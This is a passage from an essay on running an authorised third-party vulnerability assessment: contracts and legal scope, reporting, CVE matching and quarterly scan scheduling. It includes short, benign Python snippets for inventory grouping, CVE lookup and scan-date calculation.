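    by_os[h["os"]].append(h["name"])

for subnet, names in sorted(by_subnet.items()):
    print(subnet, names)
```

The same pass can group by service type (MS SQL vs. Oracle, SOAP vs. AJAX front ends), giving the outsourced scanner its target lists directly from the inventory.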

Risk from Internal Vulnerability Assessment
The risk of conducting an assessment on your own is knowing enough to be dangerous but not enough to be effective; that is why the expertise of security consultants is drawn upon. Performing your own assessment, you may omit parts of the network or devices you don't use or manage. You might even fail to test a security objective covering a major flaw in a vendor product or an implemented technology. This requires special attention, because some businesses hold contracts with other companies based on an ISO rating, meaning the company either knows how to produce consistent results or hires a company to provide the infrastructure for them. A consultant would identify the requirements for the vulnerability assessment, which is essential to making it a valid one.

Teaming up with 3rd Party Security Experts
The company has realized that, while its Information Security professional is well versed in the profession, it will seek an outside vendor to assist in the vulnerability assessment. The first thing the company needs is legal advice from an attorney versed in technology testing, where intellectual property, assets, and risk operate in the same arena. The lawyer has to be knowledgeable about 18 USC §§ 1029 and 1030, PCI, Sarbanes-Oxley, and other laws covering privacy and disclosure. The company will coordinate with the lawyer to make sure the vendor it chooses operates under an agreement.

Now the company has to find a reputable firm to perform the assessment. The agreement will be the legal document that authorizes and binds the two parties to operate professionally with the client's interest as the focal point. The firm providing the service will supply the names of the team members coming onsite or working offsite to perform the test. They must comply with company policy: all participants must be US citizens with a clean criminal record, or one that has been made right, supported by documented testimony of character and the signature of an individual recommending them for this service.

The two companies draft an agreement/contract detailing what is and is not to be scanned, as stated in slides 6 and 9. The agreement must also include liability coverage and confirm that the third party carries errors and omissions insurance. The contract will further state that if anything happens outside the scope of the test, both parties will attempt to agree verbally on a course of action to rectify the situation. No-fault clauses can be negotiated, but that is rarely allowed and runs contrary to getting legal direction. Later, the course of action taken will be written up as an addendum to the agreement and signed by an officer of each company legally able to form agreements. Once this document is done and the assessing company has written consent to perform the test, it can begin on the agreed-upon date.

Under the agreement, the technical lead (the Information Security Professional) will have the entire topology mapped and each test area scheduled. All the details of what is to be tested can be outlined here; this is where the Information Security Professional makes known which devices, and which types of scans, are and are not allowed. Most scans are noninvasive and unable to interrupt production. This approach may seem over the top, but when you are talking about intellectual property, the data privacy of individuals, and the general operating capacity of a business, there are no shortcuts. The agreement has to state what will be tested, how, when, and to what objective. There will be a schedule to follow and a communication tree to call if things go out of focus or assets become unusable.
Vulnerability Assessment
After the vulnerability assessment has been conducted, a report of the results should be created. The results may match entries on the publicly known MITRE CVE list, and the company can proactively watch the CVE site for new vulnerabilities in software it currently uses. When the third-party vendor finds these vulnerabilities, it is held to the contract not to disclose its findings. In the course of this assessment, the vendor found a way into the citizens' personal records database, giving them free range of the data therein; again, the agreement states that no matter what they find, they are not allowed to disseminate the information.
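Matching findings against the CVE list can be as simple as a lookup table keyed by software name and version. The cache below is a hand-built illustration, not a live CVE feed, though the two CVE IDs shown are real entries affecting those versions.

```python
# Hypothetical local cache of CVE entries relevant to software in use.
known_vulns = {
    ("openssl", "1.0.1"): ["CVE-2014-0160"],   # Heartbleed
    ("apache", "2.2.22"): ["CVE-2012-0053"],   # httpd response-splitting issue
}

# Software inventory gathered during the assessment (illustrative).
installed = [("openssl", "1.0.1"), ("apache", "2.4.54")]

for name, version in installed:
    cves = known_vulns.get((name, version), [])
    status = ", ".join(cves) if cves else "no known CVEs in local cache"
    print(f"{name} {version}: {status}")
```

A real program would refresh this cache from the CVE/NVD data feeds rather than hard-code it, but the matching logic stays this simple.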

The vendor now has an accumulation of vulnerabilities, configuration settings, and dependencies that need to be reported and presented for review. The report can be created with whatever software was chosen going into the assessment, but it must be hand-delivered, not emailed, to the desks of the Information Security Professional, the CISO, and the CEO's office. What happens after that is entirely the company's responsibility. The reports should be reviewed with the assessing firm to show which vulnerabilities were discovered and with what tools. The firm will show what needs to be done to correct them and then empower the company, through counsel or by outsourcing its assessments, to create a schedule.

Report Details
Once the assessment is done, the team delivers a report to the company. The report includes all the assets as they were before the scan, with the configurations and patch levels provided by the Information Security Professional and verified by the assessment team. The team had given some indication in the agreement of how the assessment would be conducted, but not at the level of detail provided in the report, which explains how each group, and in some cases individual items, were scanned. The results of the scans now need to be addressed. The assessment team provides links to vendor-specific pages for the upkeep of the software, including releases addressing security concerns. The team also points to an independent vulnerability site listing outstanding and recorded vulnerabilities for many vendors, and advises the Information Security Professional to sign up for updates on the items they host.

The assessment team then provides steps for remediation, including testing before patching by imaging the company's servers and emulating its network architecture. This is an additional service the assessment team can provide for a price, or the company can manage its own.

Routine Assessments
The schedule will be a routine check of systems, both hardware and software, to see whether any vulnerabilities went undiscovered and whether the patches applied are taking effect at protecting the assets. The Information Security Professional will then create a policy, under the guidance of senior management and the CEO, detailing the actions that must take place in a quarterly scan of the devices.

The scans should occur quarterly, in the last two weeks of the first month of the new quarter. This allows any new vulnerabilities and published exploits to surface first, and gives the company's IT group time to test and deploy patches. Each assessment is processed the same way as the initial one, with reports created in the third week. Executive reports are delivered to the CISO and CEO by the second week of the second month for review.
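The scan-window rule just stated (last two weeks of the first month of each quarter) can be computed directly; a minimal sketch, with the year chosen only for illustration:

```python
from datetime import date, timedelta
import calendar

def scan_window(year, quarter):
    """Return (start, end) of the last two weeks of the quarter's first month."""
    first_month = 3 * (quarter - 1) + 1           # Q1 -> Jan, Q2 -> Apr, ...
    last_day = calendar.monthrange(year, first_month)[1]
    end = date(year, first_month, last_day)
    start = end - timedelta(days=13)              # 14-day window, inclusive
    return start, end

for q in range(1, 5):
    start, end = scan_window(2013, q)
    print(f"Q{q}: scan {start} through {end}")
```

Report creation in the third week and executive delivery by the second week of the second month can be derived from the same window with further `timedelta` offsets.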

The executive review can consist of company employees, or here the Information Security Professional, confirming that the reports are on target for ISO certification and accreditation. Any notes provided by the assessment team can be read as a strategic vision for the IT department in the coming years.